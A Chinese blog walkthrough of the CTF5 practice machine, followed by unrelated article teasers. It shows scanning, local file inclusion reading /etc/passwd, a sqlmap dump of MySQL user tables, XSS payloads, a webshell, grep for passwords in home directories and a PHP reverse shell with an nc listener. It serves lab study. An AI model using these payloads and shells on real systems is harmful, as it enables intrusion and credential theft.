当前位置: 首页 > article >正文

靶机CTF5wp

目录扫描1.nmap -sS -sV -O -p- 192.168.126.1322.dirsearch -u http:// -x 400-500敏感信息泄露1.通过扫描有info.php该 phpinfo 页面已经严重泄露了服务器内部信息属于高风险敏感信息泄露。2.http://192.168.126.132点击blog看见nanoCMS搜索发现敏感文件/data/pagesdata.txtadmin/shannon任意文件读取加了个‘include 会将指定的文件载入并执行里面的程序重复引用加载多次。include_once 函数会将指定的文件载入并执行里面的程序此行为和 include 语句类似唯一区别是如果该文件中已经被包含过则不会再次包含。所以此页面存在任意文件读取。在“”后面添加“../”可以多但是不要少。之后访问“/etc/passwd”要用“%00”进行截断。http://192.168.126.132/?page../../../../../ ../../../../etc/passwd%00sql脱裤sqlmap -u http://192.168.126.132/list/ --datanameaaaemailbbbphonecccorgddd -D mysql -T user --dumpxss1.需要单引号闭合在不同的位置。第二个语句如果需要弹出字符需要加单引号包裹。scriptalert(fff)/scriptscriptalert(2)/script2.scriptalert(1)/script3.4.5.scriptalert(1)/script6./textareascriptalert(qaz)/scriptRCE文件保存位置如下pages/111111.php下来使用蚁剑进行连接点击右键添加数据。虚拟终端上查看当前的用户提权敏感信息提权连接蚁剑后进行敏感信息搜索grep -R -i password /home/* 2 /dev/null常用于系统管理员快速查找可能包含密码信息的配置文件、脚本或日志1. grep• 基本功能文本搜索工具默认在文件中查找匹配指定模式的行并将这些行打印出来。2. -R• 含义递归搜索。• 作用让 grep 不仅搜索指定的文件还会进入目录的子目录搜索其中的所有文件。如果没有 -R/home/* 展开后如果是目录grep 会报错并跳过。3. -i• 含义忽略大小写ignore case。• 作用使搜索不区分大小写即 password、Password、PASSWORD 等都会被匹配。4. password• 含义要搜索的模式字符串。• 作用grep 会在每个文件中查找包含该字符串的行。5. /home/*• 含义搜索路径。• 作用Shell 会将 /home/* 展开为 /home 目录下的所有非隐藏文件和目录的列表例如 /home/user1、/home/user2 等。grep 会针对这些路径进行搜索如果是目录且使用了 -R则会递归进入。• 注意如果 /home 下没有匹配项例如空目录通配符可能保持原样导致 grep 报错但错误会被重定向丢弃。6. 2 /dev/null• 含义标准错误重定向。• 2表示将文件描述符 2标准错误stderr的输出重定向到指定位置。• /dev/null是一个特殊的设备文件写入它的任何数据都会被丢弃常被称为“黑洞”。• 作用将命令执行过程中的错误信息如“权限不足无法读取文件”、“没有此类文件或目录”等全部丢弃不在终端显示。这样终端上只会显示搜索结果不会显示大量权限拒绝的干扰信息。找到rootpassword去看哪个网址cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note发现密码50$cent反弹shell反弹 ShellReverse Shell是网络安全和渗透测试中常用的一种技术指目标机器主动连接攻击者机器从而让攻击者获得一个命令行交互界面。这与传统的“正向连接”攻击者主动连接目标相反。为什么需要反弹 Shell防火墙/NAT 限制目标机器可能位于内网或开启了防火墙阻止外部主动连接入站连接被拦截但通常允许出站连接如访问 Web、DNS。动态 IP 或隧道攻击者 IP 不固定或者需要绕过网络限制让目标主动回连更灵活。权限维持反弹 Shell 可作为后门在获得初始访问后建立持久化控制。假设我们攻击了一台机器打开了该机器的一个端口攻击者在自己的机器去连接目标机器目标ip目标机器端口这是比较常规的形式我们叫做正向连接。远程桌面web服务sshtelnet等等都是正向连接。那么什么情况下正向连接不太好用了呢1、对方主机在局域网内从外网无法直接访问2、对方主机上存在WAF对主动连接发来的请求数据检测严格而对向外发出的请求不进行检测或检测较少。3、对方的ip会动态改变你不能持续控制。4、对方由于防火墙等限制对方机器只能发送请求不能接收请求。5、对于病毒木马受害者什么时候能中招对方的网络环境是什么样的什么时候开关机都是未知所以建立一个服务端让恶意程序主动连接才是上策。那么反弹就很好理解了 攻击者指定服务端受害者主机主动连接攻击者的服务端程序就叫反弹连接。在渗透测试过程中得到webshell后一般我们会反弹shell原理A主机开启9090端口的tcp服务B主机连接到A主机的9090的tcp服务A主机通过tcp服务把命令发到B主机B主机读取命令并且在bash中执行B主机把执行结果发给A主机这样就可以在A主机中操控B主机了shell?php$ip 主机ip地址;$port 主机端口;$sock fsockopen($ip, $port);$descriptorspec array(0 $sock,1 $sock,2 $sock);$process proc_open(/bin/sh, $descriptorspec, $pipes);proc_close($process);?首先必须监听nc -lvnp 8888Python 升级为交互式 Shellpython -c import pty; pty.spawn(/bin/bash)# 1. python -c# python调⽤ Python 解释器# -c执⾏后⾯字符串中的 Python 代码# 2. import pty; pty.spawn(/bin/bash)# 这是要执⾏的 Python 代码分两部分# 3. import pty# 导入 Python 的 pty 模块伪终端⼯具# 4. pty.spawn(/bin/bash)# spawn() 函数创建⼀个新的进程# /bin/bash启动 bash shell拿下

相关文章:

靶机CTF5wp

目录扫描 1.nmap -sS -sV -O -p- 192.168.126.132 2.dirsearch -u "http://" -x 400-500 敏感信息泄露 1.通过扫描有info.php 该 phpinfo 页面已经严重泄露了服务器内部信息,属于高风险敏感信息泄露。 2.http://192.168.126.132 点击blog 看见nanoCMS …...

OpenAI 发布 GPT-5.4 mini/nano:全面提升速度、性价比与开发体验

OpenAI 最新推出了两款轻量级模型——GPT-5.4 mini 和 GPT-5.4 nano。本次更新聚焦在「低延迟」「高并发适配」等核心关键词。对于开发者和终端用户而言,最直接的变化就是模型响应更快、并发下推理成本更易控制,相比旗舰模型,适用于更广泛的生…...

H3CNE--12.生成树协议

生成树协议 技术背景 如下图可以理解为是一个网状结构的网络,可靠性很高,挂了一根线,另一根可以正常用,但是会产生环路 给每台交换机添加两台PC,分别命名为A,B,C,D 此时如果两台交换机刚刚开机,A要和…...

2026年国产算力产业指南:自主软硬件+开源生态,产业链核心标的梳理

摘要:本报告系统分析了国产算力在内外双驱下的崛起路径、技术突破与生态构建,让行业从业者与投资者深入了解自主算力的核心竞争力与产业机遇。依托Chiplet、超节点等技术突破,华为昇腾、寒武纪等企业实现AI芯片性能跃升,软件生态通…...

工业园区智能巡检方案:攻克设备密集、高危区域作业、违规难管控痛点

传统工业园区巡检面临着严峻挑战:设备密集导致人工巡检耗时费力,易遗漏关键隐患;高危区域人工作业风险极高,易引发安全事故;违规作业、外来人员闯入、消防通道堵塞等问题难以实时管控;巡检数据分散&#xf…...

AF555 α-银环蛇D素,AF555-α-BTX荧光标记的光谱特性

银环蛇D荧光标记AF555,AF555-a-Bungarotoxin,AF555 α-银环蛇D素,AF555标记α-银环蛇D素,AF555-α-BTX在神经科学及细胞生物学的研究领域,对乙酰胆碱受体(Acetylcholine Receptors, AChRs)的分布…...

关于举办2026年全国大学生智能汽车竞赛研讨会的通知

...

买房的决策

高端项目的业主主要是高净值的用户,本身对于价格没有那么敏感,也甘愿为高附加值(比如高端酒店式服务)的项目付费 我发现我作为 90 后,我是 1993 的。我觉得我们 1988 到 1993 这五年的一代人,是最后的接盘侠…...

别再把汇聚当核心!90% 网络架构问题,都源于这几个误区

深夜,某数据中心突发流量拥塞,核心交换机负载飙升至 90%,前端业务全部卡顿。运维团队紧急排查,发现罪魁祸首竟是——汇聚交换机开启了大量复杂策略,导致 BGP 会话中断,整网震荡。 这样的场景,几…...

OpenClaw在文档中声明对插件行为不承担责任,这种免责条款在法律上是否站得住脚?

在讨论OpenClaw这类技术平台在其文档中声明对插件行为不承担责任的法律效力时,需要先理解一个基本前提:技术领域的免责声明从来都不是一把万能保护伞。法律看待这类条款的角度,往往比开发者预想的要复杂得多。 很多开发者习惯在文档里加一段免…...

Qwen3 推理模式深度解析:从 Qwen2.5 的“隐式思考“到 Qwen3 的“原生推理“

本文基于对 Qwen 系列模型演进的深度分析,梳理了 Qwen2.5-7B 与 Qwen3-4B 在推理能力上的本质差异,以及 Qwen3 体系内部 Instruct 模型与混合模型 no_think 模式的微妙区别。 零、问题发现 在一次偶然听报告的机会,我听见讲解者说&#xff1…...

随着OpenClaw生态壮大,是否会形成新的数字垄断——不是OpenClaw本身垄断,而是围绕它的一批商业服务商垄断?

在技术领域待得久了,总会遇到一些似曾相识的循环。当人们谈论OpenClaw生态的壮大时,那种兴奋感背后,其实藏着一种熟悉的影子。生态的繁荣往往伴随着某种集中,这几乎成了一条隐形的规律。问题不在于OpenClaw本身会不会垄断——它开…...

3dmax,云渲染中如何用Vray调节木饰面材质的方法?详细操作指南!

今天我们来看一篇关于3Dmax材质如何调节的操作,如果你也遇到了这样的情况,可以跟着操作看能不能解决。PS:如果本地渲图很吃力,可以试试国内极具性价比的云渲染平台-渲染100,注册使用渲染码就会获得测试币,拿…...

Git误操作急救手册大纲,一招在手走遍天下

Git误操作急救手册大纲常见误操作场景误删分支或提交:git branch -D或git reset --hard导致代码丢失误提交敏感信息:密码、密钥等被提交到仓库冲突处理失误:合并或变基时错误解决冲突错误覆盖远程分支:git push --force导致团队协…...

当机器翻译遇上“语感危机“:Lingualite 的多智能体答案

一、行业的三道伤口任何一个在跨境业务或学术场景中打过硬仗的人,都对翻译的痛点有切身体会。出海品牌的文案窘境。 某国产新能源品牌在欧洲官网上用通用机翻把"颠覆性体验"译成了字面意义的"破坏性经验",被当地媒体截图嘲讽。一次普…...

华为校招备考攻略:岗位、机考、面试、避坑,一篇讲透

华为校招备考攻略:岗位、机考、面试、避坑,一篇讲透 数据来源:华为官方招聘信息、华为 2024 年年报、公开岗位信息与近年公开面经整理 | 更新时间:2026 年 3 月 校招大礼包获取:获取方法 华为面试里,挺常见…...

androidstudio历史版本

网址 Android Studio 下载档案 |安卓开发者https://developer.android.google.cn/studio/archive...

前端面试全家桶,从求职准备到面试演练2023年|价值1299元|课件齐全|39章完结无密

这是一篇为你定制的导读文章,旨在帮助你跳出“题海战术”的误区,真正实现从“背诵答案”到“构建体系”的思维跃迁。 拒绝知识碎片:如何将“面试全家桶”内化为技术架构图 《硬核前端备战:面试全家桶构建系统化技术思维》&#xf…...

使用WSL2安装Ubuntu子系统

1. 确认安装环境 打开任务管理器,确认虚拟化已启用 然后系统内搜索“启用或关闭Windows功能”,开启“适用于Linux的Windows子系统”和“Hyper-V”两项,点击确认等待系统重启 2. 更新及选择WSL子系统 使用管理员打开Power Shell,…...

SEO_本地中小企业快速见效的SEO操作指南(455 )

SEO:本地中小企业快速见效的SEO操作指南在当今互联网时代,为了在竞争激烈的市场中脱颖而出,本地中小企业必须掌握一些有效的SEO操作技巧。SEO,即搜索引擎优化,是提升企业网站排名、增加流量和最终提升销售的关键。本文将从问题分析…...

监控行业90%的人还在用落后的方案,视频孪生颠覆传统监控使用模式

盯着屏幕上密密麻麻的九宫格监控画面,你是不是也常有这样的困惑——这个十字路口的东西南北到底怎么对应?这个画面和旁边那个画面到底是什么逻辑关系?每次遇到突发事件,保安人员需要盯着几十块屏幕,在脑海里拼凑出现场…...

TensorBoard 曲线“开头竖线/跳变”

在MMM2这个地图上异常结果如下:问题分析: (1)大概率没在跑 MMM2,通过查看日志,Experiment Parameters 里是:‘env_args’: {‘seed’: 2} 没有 map_name,这会让 sc2 环境回退到默认地图&#xf…...

智能员工时代已来:揭秘郑州OpenClaw技能深度定制如何重塑企业生产力

在人工智能浪潮席卷全球的今天,企业数字化转型已进入“深水区”。从最初的流程自动化,到如今追求深度智能与业务场景的精准融合,企业对大模型应用的需求正发生深刻变化。通用型AI助手虽能解决部分问题,但面对复杂的业务流程、独特…...

【samba】--- 创建任何人都能访问的 共享盘|保姆级避坑实操博文

在编程的艺术世界里,代码和灵感需要寻找到最佳的交融点,才能打造出令人为之惊叹的作品。 而在这座秋知叶i博客的殿堂里,我们将共同追寻这种完美结合,为未来的世界留下属于我们的独特印记。 【samba】--- 创建任何人都能访问的 共享盘|保姆级避坑实操博文 开发环境 一、灵魂…...

[特殊字符] 模拟试卷一:C++核心与系统基础(90分钟)

📄 模拟试卷一:C核心与系统基础(90分钟) 一、单选题(每题2分,共20分) 1.在C11中,关于auto关键字,错误的是: A) auto x 5;推导x为int B) auto& y x;推导…...

CUDA C++ Best Practices Guide读书笔记

性能优化,量化意识为王。 阅读大纲目标:系统掌握 CUDA 优化知识,服务于 tiled 矩阵乘 FlashAttention 实现 策略:读一层、做一层,交替进行,不要先读完再动手Layer 1:GPU 执行心智模型 ✅ 章节&…...

Bean 的“出生证明”:BeanDefinition 解析与扫描机制深度剖析

欢迎来到 20年代——Spring 容器的“设计院” 在 Spring 的世界里,有一个常见的误区:认为 @Component 或 <bean> 标签一写,对象就立刻诞生了。大错特错!Spring 容器启动时,第一件事绝不是 new Object(),而是读图纸。这张图纸,就是 BeanDefinition。 BeanDefinitio…...

Android的配置笔记

MyAndroidApp A new Android project. 配置_笔记。 SDK的路径配置 。 在文件 {ProjectRootDir}/gradle/wrapper/gradle-wrapper.propertieslocal.properties 中的内容示例如下。 # You can first download the file to your local machine and then reference the local path. …...

锦江酒店数百家IT资产远程运维实践:从“救火”到“主动服务”

引言&#xff1a;酒店巨头的数字化新挑战 自1935年锦江茶室创立&#xff0c;到如今成为全球领先的酒店集团&#xff0c;锦江酒店&#xff08;以下简称“锦江”&#xff09;见证了中国酒店业的发展。在数字化浪潮中&#xff0c;锦江一直走在行业前列——从收购法国卢浮集团到搭…...

技术干货版|HLS 流媒体调试必备:m3u8live.cn 在线 M3U8 播放器,免安装一键验流

在直播、点播、Web 视频、在线教育、IPTV 等流媒体业务中&#xff0c;HLS&#xff08;M3U8&#xff09; 已经成为最主流、兼容性最强的传输协议。而日常开发、测试、运维里最高频的场景&#xff0c;就是快速校验一个 M3U8 地址是否有效、能否正常播放、哪里出了问题。 传统方式…...